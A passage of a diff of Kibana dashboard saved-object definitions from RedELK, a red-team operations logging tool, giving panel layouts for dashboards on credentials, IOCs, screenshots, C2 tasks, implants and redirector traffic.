time\",\"panelRefName\":\"panel_f26413a8-7bc3-4d63-8e2e-02d1c8e06b51\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":7,\"h\":11,\"i\":\"8c5ea210-ef6d-47a3-958b-16ccc6006582\"},\"panelIndex\":\"8c5ea210-ef6d-47a3-958b-16ccc6006582\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Total credentials\",\"panelRefName\":\"panel_8c5ea210-ef6d-47a3-958b-16ccc6006582\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":31,\"y\":2,\"w\":17,\"h\":11,\"i\":\"b98cc0b8-ee93-4d34-b458-cd311eb995ea\"},\"panelIndex\":\"b98cc0b8-ee93-4d34-b458-cd311eb995ea\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Credentials realms\",\"panelRefName\":\"panel_b98cc0b8-ee93-4d34-b458-cd311eb995ea\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":13,\"w\":48,\"h\":19,\"i\":\"77f94499-3c4b-49c0-8379-62d38f4d7d8e\"},\"panelIndex\":\"77f94499-3c4b-49c0-8379-62d38f4d7d8e\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_77f94499-3c4b-49c0-8379-62d38f4d7d8e\"}]", "timeRestore": false, "title": "RedELK - Credentials dashboard", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "82b865a0-d318-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", "type": "visualization"}, {"id": "ab609c60-d319-11ea-9301-a30a04251ae9", "name": "f26413a8-7bc3-4d63-8e2e-02d1c8e06b51:panel_f26413a8-7bc3-4d63-8e2e-02d1c8e06b51", "type": "visualization"}, {"id": "dcf86190-d319-11ea-9301-a30a04251ae9", "name": "8c5ea210-ef6d-47a3-958b-16ccc6006582:panel_8c5ea210-ef6d-47a3-958b-16ccc6006582", "type": "visualization"}, {"id": "ff4497f0-d319-11ea-9301-a30a04251ae9", "name": "b98cc0b8-ee93-4d34-b458-cd311eb995ea:panel_b98cc0b8-ee93-4d34-b458-cd311eb995ea", "type": "visualization"}, {"id": "3fabe620-6c38-11ea-97d6-55783aed877a", "name": "77f94499-3c4b-49c0-8379-62d38f4d7d8e:panel_77f94499-3c4b-49c0-8379-62d38f4d7d8e", "type": "search"}], "sort": [1642152857910, 2121], "type": "dashboard", "version": "1"} -{"attributes": {"description": "RedELK IOC dashboard", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"h\":2,\"i\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"w\":48,\"x\":0,\"y\":0},\"panelIndex\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_80f94a01-4e80-42c2-b67e-971bab6e0526\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"h\":11,\"i\":\"dfd53850-c595-4597-bbb5-ea03fc22e880\",\"w\":24,\"x\":0,\"y\":2},\"panelIndex\":\"dfd53850-c595-4597-bbb5-ea03fc22e880\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"IOC over time\",\"panelRefName\":\"panel_dfd53850-c595-4597-bbb5-ea03fc22e880\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"h\":11,\"i\":\"f13deeb7-53dc-41af-9de0-486d7a171916\",\"w\":17,\"x\":31,\"y\":2},\"panelIndex\":\"f13deeb7-53dc-41af-9de0-486d7a171916\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"IOC Types\",\"panelRefName\":\"panel_f13deeb7-53dc-41af-9de0-486d7a171916\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"h\":11,\"i\":\"133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70\",\"w\":7,\"x\":24,\"y\":2},\"panelIndex\":\"133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"h\":19,\"i\":\"d492599d-f662-450b-9982-54ab7db9f174\",\"w\":48,\"x\":0,\"y\":13},\"panelIndex\":\"d492599d-f662-450b-9982-54ab7db9f174\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_d492599d-f662-450b-9982-54ab7db9f174\"}]", "timeRestore": false, "title": "RedELK - IOC dashboard", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "86643e90-d4e4-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", "type": "visualization"}, {"id": "057076f0-d4e4-11ea-9301-a30a04251ae9", "name": "dfd53850-c595-4597-bbb5-ea03fc22e880:panel_dfd53850-c595-4597-bbb5-ea03fc22e880", "type": "visualization"}, {"id": "3729cde0-d4e4-11ea-9301-a30a04251ae9", "name": "f13deeb7-53dc-41af-9de0-486d7a171916:panel_f13deeb7-53dc-41af-9de0-486d7a171916", "type": "visualization"}, {"id": "5ffe8850-d4e4-11ea-9301-a30a04251ae9", "name": "133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70:panel_133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70", "type": "visualization"}, {"id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", "name": "d492599d-f662-450b-9982-54ab7db9f174:panel_d492599d-f662-450b-9982-54ab7db9f174", "type": "search"}], "sort": [1642152857910, 2127], "type": "dashboard", "version": "1"} -{"attributes": {"description": "RedELK screenshots dashboard", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\"},\"panelIndex\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_80f94a01-4e80-42c2-b67e-971bab6e0526\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":24,\"h\":11,\"i\":\"d4eb5dce-3894-4599-8c17-042fc067d58c\"},\"panelIndex\":\"d4eb5dce-3894-4599-8c17-042fc067d58c\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Screenshots over time\",\"panelRefName\":\"panel_d4eb5dce-3894-4599-8c17-042fc067d58c\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":13,\"w\":48,\"h\":19,\"i\":\"1db7741d-210a-4331-b1cb-affc6ac1334e\"},\"panelIndex\":\"1db7741d-210a-4331-b1cb-affc6ac1334e\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_1db7741d-210a-4331-b1cb-affc6ac1334e\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":7,\"h\":11,\"i\":\"3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0\"},\"panelIndex\":\"3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Total screenshots\",\"panelRefName\":\"panel_3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":31,\"y\":2,\"w\":17,\"h\":11,\"i\":\"66403011-8fb6-402f-b9b6-5f503d6df704\"},\"panelIndex\":\"66403011-8fb6-402f-b9b6-5f503d6df704\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Screenshots target users\",\"panelRefName\":\"panel_66403011-8fb6-402f-b9b6-5f503d6df704\"}]", "timeRestore": false, "title": "RedELK - Screenshots dashboard", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "a2dcebf0-d316-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", "type": "visualization"}, {"id": "0b5ffcd0-d317-11ea-9301-a30a04251ae9", "name": "d4eb5dce-3894-4599-8c17-042fc067d58c:panel_d4eb5dce-3894-4599-8c17-042fc067d58c", "type": "visualization"}, {"id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", "name": "1db7741d-210a-4331-b1cb-affc6ac1334e:panel_1db7741d-210a-4331-b1cb-affc6ac1334e", "type": "search"}, {"id": "389dddc0-d317-11ea-9301-a30a04251ae9", "name": "3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0:panel_3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0", "type": "visualization"}, {"id": "659280b0-d317-11ea-9301-a30a04251ae9", "name": "66403011-8fb6-402f-b9b6-5f503d6df704:panel_66403011-8fb6-402f-b9b6-5f503d6df704", "type": "visualization"}], "sort": [1642152857910, 2133], "type": "dashboard", "version": "1"} \ No newline at end of file +{"attributes": {"description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"93f74516-7d73-4db3-8d64-589dfd7492b7\"},\"panelIndex\":\"93f74516-7d73-4db3-8d64-589dfd7492b7\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_93f74516-7d73-4db3-8d64-589dfd7492b7\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":48,\"h\":2,\"i\":\"66e33663-63c3-4e78-aa5d-725e33754c02\"},\"panelIndex\":\"66e33663-63c3-4e78-aa5d-725e33754c02\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_66e33663-63c3-4e78-aa5d-725e33754c02\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":4,\"w\":8,\"h\":9,\"i\":\"800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3\"},\"panelIndex\":\"800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":8,\"y\":4,\"w\":8,\"h\":9,\"i\":\"86117a55-669e-4d4d-a4d6-436da4f1a930\"},\"panelIndex\":\"86117a55-669e-4d4d-a4d6-436da4f1a930\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_86117a55-669e-4d4d-a4d6-436da4f1a930\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":16,\"y\":4,\"w\":8,\"h\":9,\"i\":\"ab07bed8-9d4e-409c-b3db-d15124eb5467\"},\"panelIndex\":\"ab07bed8-9d4e-409c-b3db-d15124eb5467\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_ab07bed8-9d4e-409c-b3db-d15124eb5467\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":4,\"w\":8,\"h\":9,\"i\":\"019655aa-c9de-444a-a4af-619b7297572b\"},\"panelIndex\":\"019655aa-c9de-444a-a4af-619b7297572b\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_019655aa-c9de-444a-a4af-619b7297572b\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":32,\"y\":4,\"w\":16,\"h\":9,\"i\":\"43a0761e-49bc-4846-9956-04a604b063ec\"},\"panelIndex\":\"43a0761e-49bc-4846-9956-04a604b063ec\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_43a0761e-49bc-4846-9956-04a604b063ec\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":13,\"w\":8,\"h\":9,\"i\":\"eab2038d-128a-4b5b-8a72-701fd3f53bd8\"},\"panelIndex\":\"eab2038d-128a-4b5b-8a72-701fd3f53bd8\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_eab2038d-128a-4b5b-8a72-701fd3f53bd8\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":8,\"y\":13,\"w\":8,\"h\":9,\"i\":\"e18544fe-ac30-43cf-891c-4448ffea6bbd\"},\"panelIndex\":\"e18544fe-ac30-43cf-891c-4448ffea6bbd\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_e18544fe-ac30-43cf-891c-4448ffea6bbd\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":16,\"y\":13,\"w\":16,\"h\":9,\"i\":\"6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d\"},\"panelIndex\":\"6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Compromised realms\",\"panelRefName\":\"panel_6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":32,\"y\":13,\"w\":8,\"h\":9,\"i\":\"223951c1-7fe0-40f9-9a89-0c91aedd7fce\"},\"panelIndex\":\"223951c1-7fe0-40f9-9a89-0c91aedd7fce\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_223951c1-7fe0-40f9-9a89-0c91aedd7fce\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":40,\"y\":13,\"w\":8,\"h\":9,\"i\":\"c15dc2cd-fad3-44a3-b127-1cd47d837740\"},\"panelIndex\":\"c15dc2cd-fad3-44a3-b127-1cd47d837740\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_c15dc2cd-fad3-44a3-b127-1cd47d837740\"}]", "refreshInterval": {"pause": true, "value": 0}, "timeFrom": "now-12M", "timeRestore": true, "timeTo": "now", "title": "RedELK - Summary dashboard", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "02486040-d355-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "93f74516-7d73-4db3-8d64-589dfd7492b7:panel_93f74516-7d73-4db3-8d64-589dfd7492b7", "type": "visualization"}, {"id": "45491770-0886-11eb-a2d2-171dc8941414", "name": "66e33663-63c3-4e78-aa5d-725e33754c02:panel_66e33663-63c3-4e78-aa5d-725e33754c02", "type": "visualization"}, {"id": "b19d4790-d35f-11ea-9301-a30a04251ae9", "name": "800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3:panel_800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3", "type": "visualization"}, {"id": "dcf86190-d319-11ea-9301-a30a04251ae9", "name": "86117a55-669e-4d4d-a4d6-436da4f1a930:panel_86117a55-669e-4d4d-a4d6-436da4f1a930", "type": "visualization"}, {"id": "b5beb3c0-d04b-11ea-9301-a30a04251ae9", "name": "ab07bed8-9d4e-409c-b3db-d15124eb5467:panel_ab07bed8-9d4e-409c-b3db-d15124eb5467", "type": "visualization"}, {"id": "389dddc0-d317-11ea-9301-a30a04251ae9", "name": "019655aa-c9de-444a-a4af-619b7297572b:panel_019655aa-c9de-444a-a4af-619b7297572b", "type": "visualization"}, {"id": "ce581930-d361-11ea-9301-a30a04251ae9", "name": "43a0761e-49bc-4846-9956-04a604b063ec:panel_43a0761e-49bc-4846-9956-04a604b063ec", "type": "visualization"}, {"id": "57626ad0-d355-11ea-9301-a30a04251ae9", "name": "eab2038d-128a-4b5b-8a72-701fd3f53bd8:panel_eab2038d-128a-4b5b-8a72-701fd3f53bd8", "type": "visualization"}, {"id": "464660c0-d360-11ea-9301-a30a04251ae9", "name": "e18544fe-ac30-43cf-891c-4448ffea6bbd:panel_e18544fe-ac30-43cf-891c-4448ffea6bbd", "type": "visualization"}, {"id": "ff4497f0-d319-11ea-9301-a30a04251ae9", "name": "6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d:panel_6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d", "type": "visualization"}, {"id": "62b61920-d4e2-11ea-9301-a30a04251ae9", "name": "223951c1-7fe0-40f9-9a89-0c91aedd7fce:panel_223951c1-7fe0-40f9-9a89-0c91aedd7fce", "type": "visualization"}, {"id": "7d850b30-d4e2-11ea-9301-a30a04251ae9", "name": "c15dc2cd-fad3-44a3-b127-1cd47d837740:panel_c15dc2cd-fad3-44a3-b127-1cd47d837740", "type": "visualization"}], "sort": [1642171876916, 34], "type": "dashboard", "version": "1"} +{"attributes": {"description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"9af964d0-b9c5-4fa0-81d7-6e7cf9657757\"},\"panelIndex\":\"9af964d0-b9c5-4fa0-81d7-6e7cf9657757\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_9af964d0-b9c5-4fa0-81d7-6e7cf9657757\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":24,\"h\":6,\"i\":\"09cb7bd6-8162-4141-8a0c-807ee57a4603\"},\"panelIndex\":\"09cb7bd6-8162-4141-8a0c-807ee57a4603\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Target host(s) and user(s) filter\",\"panelRefName\":\"panel_09cb7bd6-8162-4141-8a0c-807ee57a4603\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":12,\"h\":6,\"i\":\"fcd3a5bc-91d9-46a2-b08c-92958c5b6089\"},\"panelIndex\":\"fcd3a5bc-91d9-46a2-b08c-92958c5b6089\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Implants per host\",\"panelRefName\":\"panel_fcd3a5bc-91d9-46a2-b08c-92958c5b6089\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":36,\"y\":2,\"w\":12,\"h\":6,\"i\":\"47710d04-18f9-4563-bf0d-73b4dc24f9e5\"},\"panelIndex\":\"47710d04-18f9-4563-bf0d-73b4dc24f9e5\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Implants per user\",\"panelRefName\":\"panel_47710d04-18f9-4563-bf0d-73b4dc24f9e5\"},{\"version\":\"7.10.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":8,\"w\":48,\"h\":51,\"i\":\"30674424-d470-4b93-80c1-260d16f987ab\"},\"panelIndex\":\"30674424-d470-4b93-80c1-260d16f987ab\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_30674424-d470-4b93-80c1-260d16f987ab\"}]", "timeRestore": false, "title": "RedELK - Red Team Operations", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "04b87c50-d028-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "9af964d0-b9c5-4fa0-81d7-6e7cf9657757:panel_9af964d0-b9c5-4fa0-81d7-6e7cf9657757", "type": "visualization"}, {"id": "d2c7b720-d026-11ea-9301-a30a04251ae9", "name": "09cb7bd6-8162-4141-8a0c-807ee57a4603:panel_09cb7bd6-8162-4141-8a0c-807ee57a4603", "type": "visualization"}, {"id": "632081a0-d02a-11ea-9301-a30a04251ae9", "name": "fcd3a5bc-91d9-46a2-b08c-92958c5b6089:panel_fcd3a5bc-91d9-46a2-b08c-92958c5b6089", "type": "visualization"}, {"id": "6fcf1e70-d02a-11ea-9301-a30a04251ae9", "name": "47710d04-18f9-4563-bf0d-73b4dc24f9e5:panel_47710d04-18f9-4563-bf0d-73b4dc24f9e5", "type": "visualization"}, {"id": "1c580960-b6a9-11e8-bc1a-cf8fa3255855", "name": "30674424-d470-4b93-80c1-260d16f987ab:panel_30674424-d470-4b93-80c1-260d16f987ab", "type": "search"}], "sort": [1642171876916, 40], "type": "dashboard", "version": "1"} +{"attributes": {"description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"8f1a6a90-4b7e-47ef-aa74-a6037b7461e1\"},\"panelIndex\":\"8f1a6a90-4b7e-47ef-aa74-a6037b7461e1\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_8f1a6a90-4b7e-47ef-aa74-a6037b7461e1\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":24,\"h\":9,\"i\":\"ecf77ead-e22f-4708-addf-0cbaaeb6fced\"},\"panelIndex\":\"ecf77ead-e22f-4708-addf-0cbaaeb6fced\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Techniques, Tactics and Procedures\",\"panelRefName\":\"panel_ecf77ead-e22f-4708-addf-0cbaaeb6fced\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":24,\"h\":18,\"i\":\"ff3f84bc-6c84-43fd-aa0f-19e5a91be826\"},\"panelIndex\":\"ff3f84bc-6c84-43fd-aa0f-19e5a91be826\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"C2 tasks per host and user\",\"panelRefName\":\"panel_ff3f84bc-6c84-43fd-aa0f-19e5a91be826\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":11,\"w\":24,\"h\":9,\"i\":\"23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e\"},\"panelIndex\":\"23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Cobalt Strike tasks per operator\",\"panelRefName\":\"panel_23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":20,\"w\":48,\"h\":14,\"i\":\"b038a84c-9db0-4266-af43-c8023da4781a\"},\"panelIndex\":\"b038a84c-9db0-4266-af43-c8023da4781a\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"C2 tasks\",\"panelRefName\":\"panel_b038a84c-9db0-4266-af43-c8023da4781a\"}]", "timeRestore": false, "title": "RedELK - Tasks", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "0523c8a0-d025-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "8f1a6a90-4b7e-47ef-aa74-a6037b7461e1:panel_8f1a6a90-4b7e-47ef-aa74-a6037b7461e1", "type": "visualization"}, {"id": "88db1280-d024-11ea-9301-a30a04251ae9", "name": "ecf77ead-e22f-4708-addf-0cbaaeb6fced:panel_ecf77ead-e22f-4708-addf-0cbaaeb6fced", "type": "visualization"}, {"id": "a5554e20-d025-11ea-9301-a30a04251ae9", "name": "ff3f84bc-6c84-43fd-aa0f-19e5a91be826:panel_ff3f84bc-6c84-43fd-aa0f-19e5a91be826", "type": "visualization"}, {"id": "afb6ce00-d022-11ea-9301-a30a04251ae9", "name": "23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e:panel_23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e", "type": "visualization"}, {"id": "cc523820-d021-11ea-9301-a30a04251ae9", "name": "b038a84c-9db0-4266-af43-c8023da4781a:panel_b038a84c-9db0-4266-af43-c8023da4781a", "type": "search"}], "sort": [1642171876916, 46], "type": "dashboard", "version": "1"} +{"attributes": {"description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"lucene\",\"query\":\"\"},\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":true,\"key\":\"tags\",\"negate\":false,\"params\":{\"query\":\"iplist_redteam\"},\"type\":\"phrase\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"tags\":\"iplist_redteam\"}}},{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":true,\"key\":\"tags\",\"negate\":false,\"params\":{\"query\":\"iplist_customer\"},\"type\":\"phrase\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index\"},\"query\":{\"match_phrase\":{\"tags\":\"iplist_customer\"}}}]}"}, "optionsJSON": "{\"darkTheme\":false,\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.16.3\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":4,\"i\":\"948c1286-d4de-44a6-8fb2-95bf9252ed00\"},\"panelIndex\":\"948c1286-d4de-44a6-8fb2-95bf9252ed00\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_948c1286-d4de-44a6-8fb2-95bf9252ed00\"},{\"version\":\"7.16.3\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":4,\"w\":36,\"h\":5,\"i\":\"ab9eb0fb-a164-4295-8177-865a2a67dccb\"},\"panelIndex\":\"ab9eb0fb-a164-4295-8177-865a2a67dccb\",\"embeddableConfig\":{\"hidePanelTitles\":false,\"enhancements\":{}},\"title\":\"Filters\",\"panelRefName\":\"panel_ab9eb0fb-a164-4295-8177-865a2a67dccb\"},{\"version\":\"7.16.3\",\"type\":\"visualization\",\"gridData\":{\"x\":36,\"y\":4,\"w\":12,\"h\":5,\"i\":\"c630a33e-6a98-466d-8223-fd83e6947b8c\"},\"panelIndex\":\"c630a33e-6a98-466d-8223-fd83e6947b8c\",\"embeddableConfig\":{\"hidePanelTitles\":false,\"enhancements\":{},\"vis\":{\"legendOpen\":true}},\"title\":\"HTTP Redir traffic per backend\",\"panelRefName\":\"panel_c630a33e-6a98-466d-8223-fd83e6947b8c\"},{\"version\":\"7.16.3\",\"type\":\"map\",\"gridData\":{\"x\":0,\"y\":9,\"w\":24,\"h\":15,\"i\":\"1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a\"},\"panelIndex\":\"1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a\",\"embeddableConfig\":{\"hiddenLayers\":[],\"hidePanelTitles\":false,\"isLayerTOCOpen\":false,\"mapCenter\":{\"lat\":14.5701,\"lon\":121.0254,\"zoom\":17},\"openTOCDetails\":[],\"enhancements\":{}},\"title\":\"HTTP redir traffic map\",\"panelRefName\":\"panel_1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a\"},{\"version\":\"7.16.3\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":9,\"w\":24,\"h\":15,\"i\":\"fc254327-57ac-4e5f-88f7-a32d48570289\"},\"panelIndex\":\"fc254327-57ac-4e5f-88f7-a32d48570289\",\"embeddableConfig\":{\"hidePanelTitles\":false,\"enhancements\":{}},\"title\":\"HTTP Redir traffic over time\",\"panelRefName\":\"panel_fc254327-57ac-4e5f-88f7-a32d48570289\"},{\"version\":\"7.16.3\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":24,\"w\":24,\"h\":15,\"i\":\"829f61cf-9374-4bb5-8214-34e6875e79da\"},\"panelIndex\":\"829f61cf-9374-4bb5-8214-34e6875e79da\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_829f61cf-9374-4bb5-8214-34e6875e79da\"},{\"version\":\"7.16.3\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":39,\"w\":48,\"h\":22,\"i\":\"0bc5f60b-f940-451a-886b-edff3512d180\"},\"panelIndex\":\"0bc5f60b-f940-451a-886b-edff3512d180\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_0bc5f60b-f940-451a-886b-edff3512d180\"}]", "refreshInterval": {"pause": false, "value": 30000}, "timeFrom": "now-1d", "timeRestore": true, "timeTo": "now", "title": 